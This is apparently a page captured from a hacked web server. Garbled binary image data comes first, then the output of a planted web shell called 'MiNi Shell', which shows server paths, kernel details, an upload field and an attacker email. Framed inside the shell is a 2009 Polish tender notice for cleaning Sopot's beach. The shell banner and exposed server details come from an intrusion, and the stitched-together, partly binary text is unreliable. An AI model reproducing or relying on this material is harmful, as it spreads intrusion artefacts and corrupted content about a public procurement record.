JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090316/64046-N-2009.html

<p class="kh_header"><b>Sopot: Sprzątanie plaży w Sopocie w roku 2009 roku</b><br>
<b>Numer ogłoszenia: 64046 - 2009; data zamieszczenia: 16.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Armii Krajowej 76/82, 81-844 Sopot, woj. pomorskie, tel. (058) 5501215, faks (058) 551 61 51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.sopot.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Gminy Miasta Sopotu..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie plaży w Sopocie w roku 2009 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sprzątanie i utrzymanie czystości terenu plaży i wydm o łącznej powierzchni   97.600 m2  w okresie od kwietnia do 30 września 2009 r.
2.	Obszar plaży, której dotyczy przedmiot zamówienia:
Odcinek 1 - od granicy z Gdańskiem do wejścia nr 20                              -  	     1500 mb
Odcinek 2 - (część północna) - od mola do granicy plaży Grand Hotel -            100 mb
Odcinek 3-  od  Łazienek Północnych do wejścia nr 15                          -             250 mb
Odcinek 4  -  od wejścia  nr 12 do wejścia nr 13                                         -            100 mb
Odcinek 5- od wejścia nr 10 do wejścia nr 8				     -             250 mb
Odcinek 5  - od Mola do Hotelu Chiński                                                     -             240 mb                                                             
Razem:    2440 mb
Średnia szerokość plaży wynosi. 40 m.
3.	Przedmiot zamówienia obejmuje:
1)	mechaniczne czyszczenie piasku całego obszaru plaży wraz z dojściami do nich  z wyłączeniem wydm  polega na:  
a)	napowietrzeniu i spulchnianiu piasku poprzez odwrócenie jego spodniej warstwy;
b)	mechaniczne przesiewanie piasku na głębokość co najmniej  20 cm połączone z czyszczeniem z zanieczyszczeń organicznych i bytowo-gospodarczych;
c)	równaniu poprzez bronowanie, grabienie i wałowanie.
Harmonogram wykonywania mechanicznego czyszczenia piasku:
a)	pierwsze sprzątanie plaży niezwłocznie po zawarciu umowy;
b)	drugie sprzątanie w dniu 27 kwietnia;
c)	w miesiącach maj - czerwiec co dwa tygodnie; 
d)	w miesiącach lipiec i sierpień co tydzień; 
e)	we wrześniu co dwa tygodnie. 
Sprzątanie mechaniczne będzie się odbywało w godzinach rannych maksymalnie do godziny  9.00. 
Każdorazowo o planowanym sprzątaniu mechanicznym Wykonawca poinformuje Zamawiającego przynamniej z 1 dniowym wyprzedzeniem. 
2)	sprzątanie ręczne :
Wykonawca zobowiązany będzie do stałego utrzymania czystości plaży  i wydm codziennie łącznie z niedzielami i świętami w okresie od 15 czrewca do 13 września 2009r. w godzinach wczesno-rannych przez cały dzień do godziny 20.00, w szczególności do zbierania wszelkich zanieczyszczeń stałych z całego terenu objętego zamówieniem.
3)	opróżnianie koszy na śmieci :  
W okresie od 15 czrewca do 13 września 2009r. Wykonawca zobowiązany będzie  do opróżniania koszy wczesno-rannych oraz przez cały dzień do godziny 20.00 na bieżąco niedopuszczając do ich przepełnienia oraz do zbierania śmieci z okolicy kosza, w przypadku ich wysypania się w skutek przepełnienia, wywrócenia się kosza itp.
Wykonawca we własnym zakresie dostarczy niezbędną ilość koszy na śmieci oraz  4   zestawy koszy do selektywnej zbiórki odpadów. Wykonawca zobowiązany będzie na bieżąco dbać o czystość koszy, ich stan techniczny i ilościowy. Liczba koszy w okresie trwania umowy nie może ulec zmniejszeniu niezależnie od przyczyny.
Po zakończeniu sezonu Wykonawca zobowiązany będzie do usunięcia  koszy z terenu plaży.
Kosze o pojemności min. 80 l  stabilne i wyposażone w  worki do łatwego ich opróżniania powinny być rozstawione w środkowej części plaży w odległościach minimum co 25 m od siebie oraz drugi rząd wzdłuż wydm w odległości co 50 - 70 m.
Przy każdym wejściu ( 25 wejść)  na plażę należy ustawić po dwa kosze o pojemności min.150 l. Kosze te powinny być metalowe lub plastikowe, stabilne i zamykane.
Zestawy do selektywnej zbiórki odpadów ( w zestawie pojemnik na makulaturę, plastik i szkło o pojemności każdy co najmniej 240 l)  zostaną ustawione w miejscach wskazanych przez Zamawiającego. 
4)	wywóz i utylizacja nieczystości:
Nieczystości zebrane w trakcie wykonywania czynności, o których mowa w punktach 1-3 Wykonawca wywozić będzie na legalne wysypisko celem ich składowania, unieszkodliwiania lub utylizacji zgodnie z obowiązującymi przepisami. Na każde żądanie Zamawiającego lub upoważnionych służb komunalnych Wykonawca zobowiązany będzie do przedstawienia dowodów przyjęcia odpadów przez wysypisko.
5.	Pracownicy Wykonawcy podczas wykonywania czynności związanych z realizacją przedmiotu zamówienia winni  nosić ubrania robocze lub kamizelki  i czapki z logo firmy Wykonawcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.68.00.00-7, 90.51.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 3.000,- .zł słownie: trzy tysiące złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - w zakresie tego warunku wymagane jest aby Wykonawca posiadał : zezwolenie na prowadzenie działalności w zakresie transportu odpadów  wydane w oparciu o ustawę z  dnia 27 kwietnia 2001 r. o odpadach ( Dz.a U. Nr 62, poz.628 z póź. zm.)  oraz zezwolenie na prowadzenie działalności w zakresie odbioru odpadów komunalnych od właścicieli nieruchomości na terenie Gminy Miasta Sopotu wydane w oparciu o ustawę z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach ( Dz. U. Nr 132 poz.622 z póź. zm)
1.2	 posiadają niezbędną wiedzę i doświadczenie do wykonywania zamówienia - w zakresie tego warunku wymagane jest, aby Wykonawcy w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej jedną usługę  polegającą na sprzątaniu terenów plaży; 
1.3	dysponują niezbędnym potencjałem  technicznym do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego do wykonania zamówienia;
1.4	dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia ;
1.5	 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.6	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z powodów, o których mowa w  Art..24 ust.1 i 2 ustawy Prawo zamówień publicznych
2.	Ocena  spełnienia w/w warunków dokonana zostanie w oparciu o informacje zawarte w przedłożonych dokumentach i oświadczeniach wyszczególnionych w Rozdziale IV SIWZ z zachowaniem przepisów art. 26 ust.3 ustawy. Z treści załączonych dokumentów  i oświadczeń musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy:
1)	oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust.1 ustawy - Załącznik nr 2 do niniejszej SIWZ;
2)	zezwolenie na na prowadzenie działalności w zakresie transportu odpadów  wydane w oparciu o ustawę z  dnia 27 kwietnia 2001 r. o odpadach ( Dz.a U. Nr 62, poz.628 z póź. zm.)
3)	zezwolenie na prowadzenie działalności w zakresie odbioru odpadów komunalnych od właścicieli nieruchomości na terenie Gminy Miasta Sopotu wydaną w oparciu o ustawę z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach ( Dz. U. Nr 132 poz.622 z póź. zm)
4)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestracji lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2.	W celu potwierdzenia  posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia: 
1)	 wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców  oraz  dokumenty potwierdzające, że usługi wymienione w wykazie zostały wykonane należycie- według Załącznika nr 3 do niniejszej SIWZ.;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sopot.pl  oraz www.mosir.sopot.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Sopotu 81-704 Sopot ul. Kościuszki 25/27 pok. Nr 16..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2009 godzina 11:30, miejsce: Urząd Miasta Sopotu 81-704 Sopot ul. Kościuszki 25/27 pok. Nr 39..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com